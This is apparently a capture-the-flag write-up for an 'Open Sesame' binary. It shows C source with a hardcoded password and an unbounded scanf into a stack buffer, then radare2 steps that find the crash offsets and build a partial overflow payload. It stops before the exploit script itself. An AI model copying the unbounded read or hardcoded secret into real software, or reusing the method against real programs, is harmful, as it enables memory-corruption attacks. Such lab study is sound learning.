Open Sesame
#define SECRET_PASS "OpenSesame!!!"
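/*
 * Check whether the supplied password matches SECRET_PASS exactly.
 *
 * input: NUL-terminated candidate password; NULL is rejected.
 * Returns yes only on an exact, full-length match, no otherwise.
 *
 * The previous version compared only the first strlen(SECRET_PASS) bytes,
 * so any input that merely *started* with the secret was accepted. strcmp
 * requires the entire string to match, including its terminator.
 * strcmp returns at the first differing byte, so this is not a
 * constant-time comparison; a real authentication check should use a
 * fixed-time compare.
 */
Bool isPasswordCorrect(char *input)
{
    if (input == NULL) {
        return no;
    }
    return (strcmp(input, SECRET_PASS) == 0) ? yes : no;
}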
void caveOfGold()
{
Bool caveCanOpen = no;
char inputPass[256];
puts("BEHOLD THE CAVE OF GOLD\n");
puts("What is the magic enchantment that opens the mouth of the cave?");
flushBuffers();
scanf("%s", inputPass);
# The binary is vulnerable to a stack-based buffer overflow - it is a 64-bit ELF executable with NX enabled.
i~nx,pie,endian,rel
endian little
nx true
relocs true
relro partial
# We can generate a cyclic pattern with ragg2 -P 300 -r to cause a segment error
dc
BEHOLD THE CAVE OF GOLD
What is the magic enchantment that opens the mouth of the cave?
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB
ERROR, INCORRECT PASSWORD!
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0
# If we run wopO `dr rbp` we can find the offset to the base pointer
> wopO `dr rbp`
272
# We know that OpenSesame!!! is the password, so we can subtract its length from the RBP offset to get 259 - that means we need 259 bytes of padding AFTER supplying the password -> ('OpenSesame!!!'+b"A"*259)
# Next, we need to get the offset of the stack pointer using wopO
> pxw @ rsp
0x7fffffffde08 0x41684241 0x42416942 0x6b42416a 0x416c4241 ABhABiABjABkABlA
[...]
> wopO 0x41684241
280
# So we need 8 more characters added after our padding
('OpenSesame!!!'+b"A"*259+b"B"*8)
# Let's make our exploit script